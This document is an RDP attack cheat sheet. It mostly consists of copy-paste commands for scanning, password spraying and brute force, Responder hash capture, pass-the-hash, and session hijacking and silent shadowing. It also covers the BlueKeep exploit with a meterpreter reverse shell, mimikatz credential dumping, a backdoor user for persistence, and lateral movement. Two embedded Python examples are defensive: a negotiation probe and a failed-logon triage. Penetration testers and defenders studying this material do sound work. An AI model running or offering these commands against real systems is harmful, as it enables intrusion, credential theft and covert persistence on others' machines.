RDP

I. RDP Fundamentals

Function: Remote Desktop Protocol – GUI access to Windows systems
Port: TCP/3389 (default); UDP/3389 is the RDP UDP transport (Windows 8 / Server 2012 and later), not RD Gateway; RD Gateway listens on TCP/443 (HTTPS) and UDP/3391; custom port via HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber
Protocol: RDP over TCP; the security layer is negotiated at connect time (Standard RDP Security, TLS, or CredSSP/NLA on top of TLS)
Use Cases: Admin access, MSPs, VDI, lateral movement in AD

Attack Surface Matrix

┌────────────────────┬────────────────────┐
│ High-Impact Vectors│ Techniques         │
├────────────────────┼────────────────────┤
│ Weak Auth          │ Spraying, Brute    │
│ NTLM Exposure      │ Relay, PtH         │
│ RCE Vulns          │ BlueKeep, DejaBlue │
│ Session Abuse      │ Hijack, Shadowing  │
│ Misconfigs         │ NLA off, RD Gateway│
└────────────────────┴────────────────────┘

II. Enumeration (Passive → Active)

# 1. Port Sweep (Stealth)
nmap -p3389 --open -Pn -n -T2 10.10.10.0/24

# 2. Service Fingerprinting (quote the glob so the shell does not expand it)
nmap -Pn -sV -p3389 --script="rdp*" <IP>

# 3. Advanced RDP Scripts
nmap -p3389 --script=rdp-enum-encryption,rdp-ntlm-info,rdp-vuln-ms12-020 <IP>

# 4. Check NLA Requirement
# There is no dedicated NLA script; rdp-enum-encryption tries each security layer
# (Standard RDP, TLS, CredSSP). If only CredSSP succeeds, NLA is enforced. If
# Standard RDP or TLS-only is accepted, NLA is off (pre-auth attack surface).
nmap -p3389 --script=rdp-enum-encryption <IP>

# 5. Metasploit Auxiliaries
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS <IP>; run

# rdp_scanner also reports "Requires NLA". Safe vulnerability checks (no crash):
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <IP>; run
use auxiliary/scanner/rdp/ms12_020_check
set RHOSTS <IP>; run
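The NLA check above relies on the server's answer to the X.224 Connection Request. The following is an added example (not from the original cheat sheet) that performs that negotiation step by hand, the way rdp-enum-encryption does: it asks the server for TLS only, deliberately leaving CredSSP out, and classifies the reply. An RDP_NEG_FAILURE with HYBRID_REQUIRED_BY_SERVER means NLA is enforced; an RDP_NEG_RSP selecting TLS or Standard RDP Security, or a legacy Connection Confirm with no negotiation data at all, means it is not. The three sample Connection Confirm PDUs and the host in the comment are constructed for the example.

```python
"""RDP security-layer negotiation probe (MS-RDPBCGR X.224 Connection Request / Confirm)."""
import socket
import struct
from dataclasses import dataclass

PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_HYBRID, PROTOCOL_HYBRID_EX = 0x0, 0x1, 0x2, 0x8
RDP_NEG_REQ, RDP_NEG_RSP, RDP_NEG_FAILURE = 0x01, 0x02, 0x03
HYBRID_REQUIRED_BY_SERVER = 0x00000005
FAILURE_CODES = {1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER",
                 3: "SSL_CERT_NOT_ON_SERVER", 4: "INCONSISTENT_FLAGS",
                 5: "HYBRID_REQUIRED_BY_SERVER", 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER"}
PROTOCOL_NAMES = {0: "Standard RDP Security", 1: "TLS", 2: "CredSSP (NLA)", 8: "CredSSP + Early User Auth"}


def build_connection_request(requested_protocols: int) -> bytes:
    """TPKT header + X.224 Connection Request TPDU carrying an RDP_NEG_REQ."""
    # rdpNegReq: type, flags, length (LE16), requestedProtocols (LE32)
    neg_req = struct.pack("<BBHI", RDP_NEG_REQ, 0, 8, requested_protocols)
    # X.224 CR: length indicator, 0xE0 (CR code), dst-ref, src-ref, class option
    x224 = struct.pack("!BBHHB", 6 + len(neg_req), 0xE0, 0, 0, 0)
    body = x224 + neg_req
    return struct.pack("!BBH", 3, 0, 4 + len(body)) + body   # TPKT: version 3, reserved, total length


@dataclass
class Negotiation:
    kind: str    # "response" | "failure" | "legacy"
    value: int   # selectedProtocol, failureCode, or PROTOCOL_RDP for a legacy server

    @property
    def nla_required(self) -> bool:
        return self.kind == "failure" and self.value == HYBRID_REQUIRED_BY_SERVER

    def describe(self) -> str:
        if self.kind == "legacy":
            return "legacy server: no negotiation, Standard RDP Security only (NLA off)"
        if self.kind == "failure":
            return "negotiation failed: " + FAILURE_CODES.get(self.value, hex(self.value))
        return "server selected " + PROTOCOL_NAMES.get(self.value, hex(self.value))


def parse_connection_confirm(data: bytes) -> Negotiation:
    """Parse TPKT + X.224 Connection Confirm, with or without the optional rdpNegData."""
    if len(data) < 11 or data[0] != 0x03:
        raise ValueError("not a TPKT-framed X.224 PDU")
    (tpkt_len,) = struct.unpack("!H", data[2:4])
    li, code = data[4], data[5]
    if tpkt_len != len(data) or (code & 0xF0) != 0xD0:
        raise ValueError("not a well-formed Connection Confirm")
    if li == 6:   # only the 6 fixed CC bytes follow LI: server predates negotiation
        return Negotiation("legacy", PROTOCOL_RDP)
    neg_type, _flags, length, value = struct.unpack("<BBHI", data[11:19])
    if length != 8 or neg_type not in (RDP_NEG_RSP, RDP_NEG_FAILURE):
        raise ValueError("unexpected rdpNegData")
    return Negotiation("response" if neg_type == RDP_NEG_RSP else "failure", value)


def probe(host: str, port: int = 3389, timeout: float = 5.0) -> Negotiation:
    """Live check: request TLS only; an NLA-enforcing host answers HYBRID_REQUIRED_BY_SERVER."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connection_request(PROTOCOL_SSL))
        return parse_connection_confirm(sock.recv(1024))


# Constructed Connection Confirm PDUs for offline use (the 0x1234 src-ref is arbitrary).
SAMPLE_NLA_ENFORCED = bytes.fromhex("03 00 00 13 0e d0 00 00 12 34 00 03 00 08 00 05 00 00 00")
SAMPLE_TLS_ALLOWED = bytes.fromhex("03 00 00 13 0e d0 00 00 12 34 00 02 00 08 00 01 00 00 00")
SAMPLE_LEGACY = bytes.fromhex("03 00 00 0b 06 d0 00 00 12 34 00")

if __name__ == "__main__":
    for name, pdu in (("nla", SAMPLE_NLA_ENFORCED), ("tls", SAMPLE_TLS_ALLOWED), ("legacy", SAMPLE_LEGACY)):
        n = parse_connection_confirm(pdu)
        print(f"{name}: {n.describe()} -> NLA required: {n.nla_required}")
    # Live: print(probe("10.10.10.10").describe())   # hypothetical host
```

The request sent is byte-for-byte the one a normal client sends when it does not support CredSSP, so the probe is indistinguishable from a legacy client attempt; it does not complete a logon and leaves no 4624/4625, though connection-manager events on the host still record the TCP connection.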

Bonus: Shodan/Zoomeye

# Shodan
port:3389 os:Windows country:GB
# Zoomeye
port:3389 +country:"United Kingdom"

III. Authentication Attacks

A. Password Spraying (Low & Slow)

# Spraying = one password across many users, so each account sees one failure per
# round. Check the lockout policy first (net accounts /domain) and stay under the
# threshold within the observation window.

# Crowbar (supports proxy, resume); one thread keeps the rate low
crowbar -b rdp -s <IP>/32 -U users.txt -c 'Password123!' -n 1

# Hydra (fast, verbose); keep -t small, RDP servers drop parallel connections
hydra -L users.txt -p 'Winter2025!' -t 4 -V <IP> rdp

# CrackMapExec / NetExec (AD-aware, spray + enum). A password file here means every
# password per user (brute force); for a spray pass a single password.
cme rdp <IP>/32 -u users.txt -p 'Winter2025!' --continue-on-success

B. Credential Capture (Pre-Auth, Client-Side)

# Responder ships a rogue RDP listener (RDP = On in Responder.conf). A client that is
# tricked into connecting to you (poisoned LLMNR/NBT-NS name, or a delivered .rdp file
# pointing at your host) completes CredSSP/NLA against the listener and leaks an NTLMv2
# response. It is the client that authenticates to you; the real server's NLA setting
# is irrelevant. Connecting to the target with fake credentials leaks nothing.
responder -I eth0 -w
# Captured hashes are written under Responder's logs/ directory; crack offline.
# Sanity-check the listener from your own box before relying on it:
xfreerdp /v:<attacker_IP> /u:fakeuser /p:fakepass /cert-ignore

C. Brute Force (High Risk – Use in Labs)

patator rdp_login host=<IP> user=FILE0 password=FILE1 0=users.txt 1=rockyou.txt -x ignore:fgrep='locked'
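The difference between the three attack shapes above (spray, brute force, and a lockout-inducing run) is exactly what a defender's logic keys on, so here is an added example (not part of the original cheat sheet) that triages constructed Windows 4625 failed-logon events per source address. One caveat it builds in: with NLA enforced, a failed CredSSP pre-authentication is logged as Logon Type 3 (network), not Type 10, so filtering on Type 10 alone misses the spray entirely. The hosts, users and timestamps are made up for the example.

```python
"""Spray vs brute-force triage over Windows Security 4625 (failed logon) events."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

STATUS_BAD_CREDS = "0xC000006D"      # unknown user or bad password
STATUS_BAD_PASSWORD = "0xC000006A"   # known user, wrong password
STATUS_LOCKED_OUT = "0xC0000234"     # account locked out


def event(ts, ip, user, logon_type=3, status=STATUS_BAD_CREDS):
    """One 4625 record, reduced to the fields the triage uses (field names mirror the event XML)."""
    return {"time": datetime.fromisoformat(ts), "ip": ip, "user": user,
            "logon_type": logon_type, "status": status}


# Constructed sample: a spray, a brute force that trips lockout, and a benign typo.
SAMPLE_EVENTS = (
    [event(f"2025-03-01T09:0{i}:00", "10.10.10.5", u)                          # 6 users, 1 try each
     for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
    + [event(f"2025-03-01T10:00:{i * 5:02d}", "10.10.10.9", "administrator",   # 12 tries, 1 user
             status=STATUS_LOCKED_OUT if i >= 10 else STATUS_BAD_PASSWORD) for i in range(12)]
    + [event("2025-03-01T11:00:00", "10.10.10.20", "grace", logon_type=10),    # 2 typos, Type 10
       event("2025-03-01T11:00:30", "10.10.10.20", "grace", logon_type=10)]
)


def triage(events, window=timedelta(minutes=30), spray_users=5, brute_attempts=10):
    """Return {source_ip: finding} for sources whose failures fit a spray or brute-force pattern.

    A sliding window per source is scored by distinct target users and attempts per user:
    many users with at most 2 tries each is a spray; one user with many tries is brute force.
    Lockout statuses are counted so the finding also says whether the attacker hit the threshold.
    """
    by_source = defaultdict(list)
    for e in events:
        by_source[e["ip"]].append(e)
    findings = {}
    for src, evs in by_source.items():
        evs.sort(key=lambda e: e["time"])
        best = None
        for i, start in enumerate(evs):
            in_window = [e for e in evs[i:] if e["time"] - start["time"] <= window]
            per_user = Counter(e["user"] for e in in_window)
            verdict = None
            if len(per_user) >= spray_users and max(per_user.values()) <= 2:
                verdict = "spray"
            elif max(per_user.values()) >= brute_attempts:
                verdict = "brute_force"
            if verdict and (best is None or len(in_window) > best["attempts"]):
                best = {
                    "verdict": verdict,
                    "attempts": len(in_window),
                    "users": len(per_user),
                    "lockouts": sum(e["status"] == STATUS_LOCKED_OUT for e in in_window),
                    # all Type 3 on an RDP host = failures happened at the CredSSP/NLA stage
                    "nla_preauth": all(e["logon_type"] == 3 for e in in_window),
                }
        if best:
            findings[src] = best
    return findings


if __name__ == "__main__":
    for src, f in triage(SAMPLE_EVENTS).items():
        print(src, f)
```

Thresholds are deliberately below typical lockout policies (5 users, 10 attempts) so the alert fires before an attacker's "low and slow" schedule pays off; tune `window` to the domain's lockout observation window so the two sides are reasoning about the same interval.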

IV. Protocol-Specific Attacks

A. Pass-the-Hash (PtH) – Restricted Admin Mode

# NLA normally needs the cleartext password. PtH over RDP works only when the target has
# Restricted Admin mode enabled (DisableRestrictedAdmin = 0). Setting it requires local
# admin on the target first, so this is a lateral-movement technique, not initial access.
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0x0 /t REG_DWORD /f

# Auth with the NT hash only: xfreerdp's /pth takes the NT hash, not LM:NT, and turns
# on Restricted Admin automatically. Hash from mimikatz/secretsdump; the one below is the
# well-known empty-password NT hash, used as a placeholder.
xfreerdp /v:<IP> /u:administrator /pth:31d6cfe0d16ae931b73c59d7e0c089c0 /cert-ignore
# Caveat: a Restricted Admin session holds no network credentials, so anything it reaches
# on the network (shares, other hosts) authenticates as the machine account, not the user.

B. RDP Session Hijacking (Post-Login, Needs SYSTEM)

# List sessions on the compromised host. Disconnected sessions are the usual target:
# tscon running as SYSTEM reattaches them without knowing the user's password.
query user
# Output: USERNAME SESSIONNAME ID STATE
#        admin    rdp-tcp#12  2  Active
#        you      rdp-tcp#15  3  Active

# Move session ID 2 into your own session (rdp-tcp#15). tscon must run as SYSTEM,
# hence the throwaway service; delete it afterwards.
sc.exe create sesshijack binpath= "cmd /c tscon 2 /dest:rdp-tcp#15"
net start sesshijack

C. Session Shadowing (Local Admin)

# Allow full control without the user's consent (Shadow = 2; 1 = full control with
# prompt, 3/4 = view only). This is a policy key, so a GPO refresh may reset it.
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow /t REG_DWORD /d 2 /f

# Shadow session 2 on the target with input control; the user sees no prompt
mstsc /shadow:2 /control /noConsentPrompt /v:<target_IP>

D. RDP via RD Gateway (Reaching Internal Hosts Through an Exposed Gateway)

# Gateway exposed on 443: /g: is the gateway (with its own credentials), /v: is the
# internal target the gateway forwards to; the two sets of credentials can differ
xfreerdp /v:<internal_host> /g:rdpgateway.corp.local /gu:gatewayuser /gp:pass /u:domainadmin /d:corp /cert-ignore

V. RCE Vulnerabilities

A. CVE-2019-0708 (BlueKeep) – Pre-Auth RCE

# Check first (safe, no crash)
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS <IP>; run

# Exploit
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <IP>; set payload windows/x64/meterpreter/reverse_tcp
set target <n>    # pick the exact OS/hypervisor build from `show targets`
exploit

Note: Unstable – a wrong target or unexpected kernel memory layout causes a BSoD.
Affects Windows 7 / Server 2008 R2 and earlier only; Windows 8 and later are not vulnerable.

B. CVE-2019-1181 / CVE-2019-1182 (DejaBlue) – Pre-Auth, Wormable

Affects Windows 7 through Windows 10 and Server 2008 R2 through 2019; patched August 2019.
No public Metasploit module and no reliable public exploit: verify by build number / KB
level and report it as a patch-level finding rather than attempting exploitation.

C. CVE-2025-28114 – RDP Heap Overflow in CredSSP Parsing
CVSS: 9.8 | Pre-Auth RCE | Affects Win10/11, Server 2022
Exploit: Metasploit module (TBA), Python PoC on GitHub
(Details as listed on this page; confirm against the MSRC advisory before relying on them.)
# Scan with Nuclei
nuclei -u <IP>:3389 -t cves/CVE-2025-28114.yaml

VI. Post-Exploitation via RDP

A. Credential Harvesting

# Mimikatz over RDP (privilege::debug is required before sekurlsa:: can read LSASS)
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit > creds.txt

# Kerberos tickets held by the RDP session
klist

B. Persistence

# Add RDP user (noisy: 4720 user created, 4732 group membership added)
net user rdpbackdoor P@ssw0rd! /add
net localgroup "Remote Desktop Users" rdpbackdoor /add

# Enable RDP if disabled. The "Remote Desktop" firewall rule group must also be
# enabled, or 3389 stays blocked on the host.
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

C. Lateral Movement

# From the RDP shell: enable RDP on every host where the local admin hash works,
# then connect with xfreerdp /pth (see IV.A; needs Restricted Admin on the target)
cme smb 10.10.10.0/24 -u admin -H <NThash> --rdp enable

VII. Evasion

# Validate credentials without opening a desktop: +auth-only completes NLA and then
# disconnects. This is not an NLA bypass (NLA cannot be bypassed from the client side)
# and the logon attempt is still recorded as 4624/4625.
xfreerdp /v:<IP> /u:user /p:pass +auth-only /cert-ignore

# No clipboard redirection and no drive mapping (fewer client-side artefacts on the target)
xfreerdp /v:<IP> /u:user /p:pass -clipboard /cert-ignore

# Tunnel RDP over SSH/SOCKS
proxychains xfreerdp /v:<IP> /u:user /p:pass /cert-ignore

VIII. Key Commands Summary (Copy-Paste Ready)

# Enumeration
nmap -p3389 --script="rdp*" <IP>
cme rdp <IP> -u admin -p Password123!

# Spraying
crowbar -b rdp -s <IP>/32 -U users.txt -c 'Welcome123!'
hydra -L users.txt -p 'Autumn2025!' <IP> rdp

# Login
xfreerdp /v:<IP> /u:admin /p:Password123 /cert-ignore
rdesktop <IP> -u admin -p Password123

# PtH
xfreerdp /v:<IP> /u:admin /pth:31d6cfe0d16ae931b73c59d7e0c089c0

# Session Hijack
query user
sc.exe create hijack binpath= "cmd /c tscon 2 /dest:rdp-tcp#15"
net start hijack

# Enable Restricted Admin
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /d 0x0 /f

# Metasploit RCE
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce; set RHOSTS <IP>; set target <n>; exploit
